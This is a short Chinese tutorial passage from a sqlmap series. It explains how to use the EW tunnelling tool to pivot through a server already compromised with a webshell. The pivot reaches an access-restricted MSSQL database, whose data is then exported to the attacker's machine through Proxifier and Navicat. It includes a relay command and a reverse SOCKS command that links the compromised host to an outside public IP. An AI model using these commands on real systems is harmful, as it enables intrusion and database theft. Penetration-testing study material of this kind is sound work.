sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据

4.7 使用EW代理导出和导入MSSQL数据

一般的场景就是目标站点获取了webshell,然后数据库的IP地址不在目标站的本地,而且做了精准的访问控制,只允许目标站点的IP地址才能访问数据库,那么这个场景就适合通过代理的方式导出和导入了

4.7.1 设置代理

1. 在独立的公网IP执行命令

命令如下:

ew -s rcsocks -l 1080 -e 3389

 

sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据
 

上面的3389端口是独立公网IP地址监听的端口,1080是代理端口

2. 在被控制服务器上执行命令

命令如下:

ew -s rssocks -d 120.78.194.70 -e 3389

 

sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据
 

上面是使用独立的公网IP地址连接8888端口

3. 设置Proxifier

此处记得使用socks5即可,配置的IP就是公网的IP地址加代理端口1080,由于我这里是直接在vps上直接使用的,所以我配置的是vps的内网IP地址,大家在实际环境中,如果是在本地PC那么就可以使用公网IP地址加代理端口即可

 

sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据
 
sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据
 

4. 测试代理

4.7.2 设置Navicat for Sql Server

1. 设置Navicat for Sql Server连接

 

sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据
 

正常设置连接即可

2. 连接测试

4.7.3 导出数据库

1. 选择和设置数据库导出

2. 去除删除数据库表选项

3. 导出数据

 

sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据
 

4.7.4 导入SQL Server数据库

(1) 在本地SQL Server数据库中创建对应的数据库名称

(2) 设置相同的用户,此处设置导出的是数据对应的用户名和密码,以及与导出的SQL文件对应的用户和权限,防止出现权限不一致而导致导入数据失败的情况

(3) 设置用户的对应权限,在SQL Server中对用户设置可以访问数据库及数据库角色权限

(4) 设置Navicat for SQL Server 连接,使用同样的方法在本地建立数据库连接

(5) 连接数据库服务器,打开需要导入的数据库到dbo处,选择运行SQL文件,选中导出SQL文件,开始导入数据

(6) 数据导入成功后,刷新数据库即可在本地使用

作者已经把本小节发布到公网上了,下面是地址链接:

http://www.mamicode.com/info-detail-2420471.html 

 

sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据
 

sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据

上一篇:C#校验SQL脚本是否合法,不去执行sql语句


下一篇:mysql省市区数据表